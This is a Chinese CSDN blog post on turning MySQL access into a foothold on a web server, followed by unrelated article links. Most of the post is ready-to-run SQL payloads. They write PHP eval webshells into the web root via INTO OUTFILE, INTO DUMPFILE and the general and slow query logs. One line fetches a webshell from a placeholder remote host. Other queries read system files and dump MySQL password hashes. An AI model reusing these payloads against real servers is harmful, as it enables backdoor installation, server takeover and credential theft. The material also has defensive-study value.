mysql利用

最新推荐文章于 2024-08-25 15:00:09 发布
最新推荐文章于 2024-08-25 15:00:09 发布
阅读量339 收藏 1
点赞数 1
分类专栏: 优秀文章 秀秀 文章标签: mysql 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52549196/article/details/129495472
版权
优秀文章 同时被 2 个专栏收录
166 篇文章 51 订阅 ¥9.90 ¥99.00
订阅专栏
秀秀
178 篇文章 0 订阅
订阅专栏
本文介绍了如何利用MySQL数据库进行webshell写入,包括outfile、dumpfile、general_log和slow_query_log_file等方法,讨论了不同方法的限制和注意事项,以及通过读取系统文件和数据库信息来获取shell的思路。
摘要由CSDN通过智能技术生成
写webshell

以mysql数据库为例

outfile

写shell需要判断当前有没有设置secure_file_priv,只有当secure_file_priv为空才有权限写文件,这个配置由my.ini定义,无法在执行sql的情景更改配置。

show global variables like '%secure%';

写入webshell

#写入常规一句话
select '<?php eval($_POST["x"]) ?>' into outfile 'C:\\phpstudy_pro\\WWW\\loga.php';
#存到数据库表中再写入
Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('<?php eval($_POST[x]) ?>');Select cmd from temp into outfile 'C:\\phpstudy_pro\\WWW\\loga.php';Drop TABLE IF EXISTS temp;
#使用hex编码写入
select 0x3c3f706870206576616c28245f504f53545b2278225d29203f3e into outfile 'C:\\phpstudy_pro\\WWW\\x.php'

outfile可以导出多行数据,但是在将数据写到文件时mysql会对换行符(0a),制表符(09)等特殊字符做处理。使用有换行符的webshell时,很多hex编码后换行符使用的是0a(即\n),而0a会被outfile做特殊处理,除了换行符外还会额外增加一个\符号,所以我们写shell时如果用0a做换行符会破坏我们的webshell结构导致失败。

例如当我们尝试写入最简单的一个有换行符和制表符shell

select 0x3c3f7068700a096576616c28245f504f53545b2278646464646464646464225d3b0a3f3e into outfile 'C:\\phpstudy_pro\\WWW\\xddddddddd.php'

poc如下:

#在同目录生成密码是cmd的一句话cmd.php
select '<?php file_put_contents("cmd.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKSA/Pg=="));?>' into outfile 'C:\\phpstudy_pro\\WWW\\1.php'
dumpfile

写shell需要判断当前有没有设置secure_file_priv,只有当secure_file_priv为空才有权限写文件,这个配置由my.ini定义,无法在执行sql的情景更改配置

show global variables like '%secure%';

写入shell

#写入常规一句话
select '<?php eval($_POST["x"]) ?>' into dumpfile 'C:\\phpstudy_pro\\WWW\\loga.php';
#存到数据库表中再写入
Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('<?php eval($_POST[x]) ?>');Select cmd from temp into outfile 'C:\\phpstudy_pro\\WWW\\loga.php';Drop TABLE IF EXISTS temp;
#使用hex编码写入
select 0x3c3f706870206576616c28245f504f53545b2278225d29203f3e into outfile 'C:\\phpstudy_pro\\WWW\\x.php'

dumpfile只能导出一行数据,但是写入shell时不会像outfile那样有换行符的坑点,dumpfile写入文件时会严格保持原数据格式,所以我们打udf写入dll都用dumpfile

general_log

利用日志getshell的方法不受secure_file_priv的限制,只要知道web绝对路径即可。

查询general_log的配置

show global variables like '%general_log%';		#查询general_log的配置,以便事后恢复
#或
select @@general_log_file		#查询general_log目录
select @@general_log   #查询general_log是否开启,0表示未开启,1表示开启

开启general_log

set global general_log='ON';
set global general_log_file='C:\\phpstudy_pro\\WWW\\log.php';
#执行后应该立即能在网站访问到log.php文件

写入webshell内容

#任意写入一句话马
select '<?php @eval($_POST[01282095])?>'
#注意这里不能用hex编码,因为用了hex记录到log文件里的内容还是hex编码的内容,而不是hex编码后的内容。而且尽量用简短的马,内容多的马遇到一些特殊字符容易出错。

#由于只要有sql语句执行就会记录到日志里,执行语句多了可能插入特殊字符导致我们的马被破坏结构。所以建议拿到权限后尽快传新的马并恢复原本的general_log配置。
#应对这类情况一般我们可以传一个写文件的马,在同级目录生成密码是cmd的一句话cmd.php
select '<?php file_put_contents("cmd.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKSA/Pg=="));?>'
#或者远程加载
select '<?php file_put_contents("xx.php",file_get_contents("http://vpsip/webshell.txt");?>'
slow_query_log_file

利用慢日志getshell的方法也不受secure_file_priv的限制,只要知道web绝对路径即可。

查询慢日志的配置

show variables like '%slow%'  #查询慢日志配置,以便事后恢复
或
select @@slow_query_log_file    #查询慢日志目录,以便事后恢复
select @@slow_query_log			#查询慢日志是否开启,0表示未开启,1表示开启

开启慢日志

set GLOBAL slow_query_log_file='C:\\phpstudy_pro\\WWW\\log.php';
set GLOBAL slow_query_log=on;

写入webshell内容

#和前面的general_log完全一致,只需要在sql语句结尾加上sleep(10)触发延时即可
select '<?php @eval($_POST["x"])?>' from mysql.db where sleep(10);
#写文件shell
select '<?php file_put_contents("cmd.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKSA/Pg=="));?>' from mysql.db where sleep(10);
写文件获取shell思路

以mysql为例,已知公开的不写webshel要获取服务器权限的思路,都是围绕利用写文件的特性写入各种特殊的文件触发命令执行等行为获取shell权限。

所以仍需要判断当前有没有设置secure_file_priv,只有当secure_file_priv为空且secure_auth为OFF才有权限写文件

show global variables like '%secure%';
读系统文件

有可能有特大的文件用mysql读文件的洞读不到,这时可以在adminer后台使用load_file去尝试读一下

#常规读文件
select load_file('C:\\phpstudy_pro\\WWW\\index.html')
#路径可以使用hex编码,且读到的数据是blob格式,需要hex编码一下方便取出来
select hex(load_file(0x433A5C5C70687073747564795F70726F5C5C5757575C5C696E6465782E68746D6C))
读数据库中网站管理员用户密码
直接找密码字段

一般adminer这边干不动,就可以去尝试下网站后台那边是否有可以相互配合的漏洞

#搜索es库中包含pass字段的表名
select table_schema,table_name,column_name from information_schema.COLUMNS where column_name like '%pass%' and table_schema='es'
#搜索所有库中包含pass字段的表名
select table_schema,table_name,column_name from information_schema.COLUMNS where column_name like '%pass%'
读mysql账户的密码

如果无法获得网站管理员的明文密码,可以尝试读取并解密mysql用户的账号密码,并根据解密后的密码内容猜测网站管理员后台账号密码

# MySQL 5.6 and below
select host, user, password from mysql.user;
# MySQL 5.7 and above
select host, user, authentication_string from mysql.user;

????27282
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
MySQL利用sql文件生成数据库
qq_37647812的博客
02-21 2955
1,将要导入的.sql文件移至bin文件下,这样的路径比较方便 2,登录MySQLmysql -u 用户名 -p如我输入的命令行:mysql -u root -p (输入同样后会让你输入MySQL的密码) 3,在MySQL中新建你要建的数据库,这时是空数据库,如新建一个名为news的目标数据库 4,输入:mysql>use 目标数据库名如我输入的命令行:mysql>use news; 5,导入文件:mysql>source 导入的文件名;如我输入的命令行:mysql>...
MySQL利用binlog恢复库表
11-18
### MySQL利用binlog恢复库表 #### 一、利用binlog恢复库表的背景与重要性 在数据库管理中,由于误操作等原因导致的数据丢失是一个常见的问题。为了应对这类情况,MySQL提供了多种备份和恢复机制,其中二进制日志...
MySQL利用多核处理器
Make
07-01 3032
在工作中可能遇到这样的情况,随着业务的增长,用户量也在逐渐增长,终究有一天,一到高峰期,数据库服务器CPU利用率直飚100%。 最简单的做法就是直接提升硬件性能,简单粗暴,直接有效。 假如我们最开始的服务器CPU核数是4,然后我们觉得4个有点扛不住,那就直接给他搞16个核。这下应该没啥问题了吧,用户访问站点貌似也比以前快了。但是不要高兴太早,当你打开任务管理器,你会发现利用率高的还是以前那几个...
MySQL利用视图插入修改删除数据
snowzmy的博客
04-18 5853
利用视图插入修改删除记录时注意事项
MySQL索引性能优化分析
热门推荐
张彦峰的博客
04-07 173万+
总结MySQL索引性能优化,主要集中在索引的背景介绍以及索引的高效创建、使用和查询等,最有给出除了索引的一些其他优化思路
mysql如何使用多核cpu_mysql利用CPU多核
weixin_42168830的博客
01-19 4119
今天感觉mysql数据库写入时有时会失败,感觉是性能上有点问题,发现CPU很快就占满了,通过查找资料,有如下这么一段话Ilearnedsomethingsurprising:Inspiteofthedocumentation,itisbesttoleaveinnodb_thread_concurrencyat0(infiniteconcurrency).Tha...
MySQL利用idb文件恢复frm.rar
04-14
"MySQL利用idb文件恢复frm"的主题就是关于如何在这样的情况下,通过.idb(InnoDB数据文件)和.frm(表结构文件)进行数据恢复的过程。下面将详细解释这个过程涉及的关键知识点。 首先,`.frm`文件是MySQL中存储表...
Mysql利用group by分组排序
01-19
我们可以利用MySQL中的group by的特性。 MySQL的group by与Oracle有所不同,查询得字段可以不用写聚合函数,查询结果取得是每一组的第一行记录。 利用上面的特点,可以利用mysql实现一种独特的排序; 首先先按某个...
基于ajax+jsp+servlet+mysql利用IDEA实现的图书管理系统源码+数据库.zip
01-11
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和...基于ajax+jsp+servlet+mysql利用IDEA实现的图书管理系统源码+数据库.zip
mysql利用init-connect增加访问审计功能的实现
12-15
mysql的连接首先都是要通过init-connect初始化,然后连接到实例。 我们利用这一点,通过在init-connect的时候记录下用户的thread_id,用户名和用户地址实现db的访问审计功能。 实现步骤 1、创建审计用的库表。 为了不...
MySQL对JSON数据类型的处理
cesske的博客
08-21 340
MySQL从5.7版本开始提供了对JSON数据类型的支持,‌使得MySQL能够直接存储和管理JSON格式的数据。‌这使得在数据库中处理JSON数据变得更为方便和高效。‌以下是一些常用的处理JSON数据的函数和操作:‌。通过这些操作和函数,‌MySQL允许你灵活地处理JSON数据,‌使得在数据库层面进行复杂的数据操作成为可能。4.‌使用JSON_EXTRACT提取JSON字段。9.‌删除JSON中的键值对。8.‌替换JSON中的值。10.‌搜索JSON数据。2.‌插入JSON数据。6.‌更新JSON数据。
MySQL创建与删除表
weixin_69053029的博客
08-21 268
表名(列名 类型,列名 类型......);
MySQL】表的增删查改
muyuteacher的博客
08-21 861
数据库管理中,CRUD(Create, Read, Update, Delete)是一组基本的操作,用于管理表中的数据。Create:创建新的记录或表。Read:检索表中的数据。Update:修改表中现有记录的数据。Delete:从表中移除记录。本文将对这四种操作进行详细介绍。
MySQL——多表操作(一)外键(3)添加外键约束的参数说明
PAP
08-23 173
MySQL——多表操作(一)外键(3)添加外键约束的参数说明
MySQL】关于编译的MySQLmysql.sock路径
qq_24428851的博客
08-21 560
如果是下载的官方MySQL二进制安装包或者编译安装(编译时使用的默认值,没有特意指定mysql.sockl路径),那么mysql.sock的路径是。并且如果路径原本不存在,启动MySQL之前你需要手动创建,主要目录的属主属组,使得MySQL启动时有写入权限!文件路径,启动时,不会有什么问题,MySQL Server 会将mysql.sock 文件生成在相应的目录。如果是用官方rpm安装或者拉取的官方docker镜像起的MySQL服务,mysql.sock的路径是。【MySQL】关于 mysql.sock。
[mysql][sql]mysql查询表大小
一名不太专业的程序员
08-21 399
表中选择特定数据库(在这个例子中是名为 'crawleroocllisten' 的数据库)的表信息。查询结果包括数据库名、表名、表中的记录数以及数据和索引所占用的空间容量(单位为MB)。这个查询通常用于数据库管理,帮助管理员了解数据库中各个表的大小和记录数,以便进行优化和维护。函数来将数据和索引长度除以1024两次(将字节转换为MB),并且保留两位小数。SQL 查询语句,用于从。
mysql】大规模企业常用的MySQL性能优化方案分享
景天科技苑
08-21 914
MySQL作为广泛使用的关系型数据库管理系统,其性能优化对于提升应用程序的响应速度、保障系统稳定运行以及提高用户体验至关重要。本文将结合实际案例,详细阐述MySQL性能优化的多种策略和方法,涵盖查询优化、索引优化、表结构优化、服务器配置调整、定期维护、缓存技术、数据分区与分表、负载均衡技术、数据库设计优化以及性能监控与调优等多个方面。
MySQL系统性的学习--基础
kussm_的博客
08-23 412
用来管理数据库用户、控制数据库的访问权限。在MySQL中,用户的信息及用户所具有的权限的信息都是存放在 mysql 库中的 user 表里,同时知道主机地址和用户名才能完整的定位一个用户。
MySQL中的事务
最新发布
2301_80389611的博客
08-25 739
Session A和Session B各开启了一个事务,Session B中的事务先将studentno列为1的记录的name 列更新 为'张三',然后Session A中的事务再去查询这条studentno为1的记录,如果读到列name的值为' 张三',而 Session B中的事务稍后进行了回滚,那么Session A中的事务相当于读到了一个不存在的数据, 这种现象 就称之为 脏读。事务的执行是互不干扰的,一个事务不可能看到其他事务运行时中间某一时刻的数据。基于锁的状态分类:意向共享锁、意向排它锁。
MySQL 利用聚合函数UPDATE
03-02
抱歉,我可以回答你的问题。MySQL中的UPDATE语句通常用于更新表中的现有记录。如果您想在UPDATE语句中使用聚合函数,则可以使用子查询来实现。例如,您可以使用以下语句来将某个表中的所有记录的平均值设置为特定值: ``` UPDATE table_name SET column_name = (SELECT AVG(column_name) FROM table_name); ``` 在这个例子中,我们使用了AVG()聚合函数来计算表中某个列的平均值,并将其作为子查询返回。然后我们使用UPDATE语句将这个平均值设置为表中所有记录的新值。 请注意,这只是一个简单的示例,实际使用中可能需要根据具体情况进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值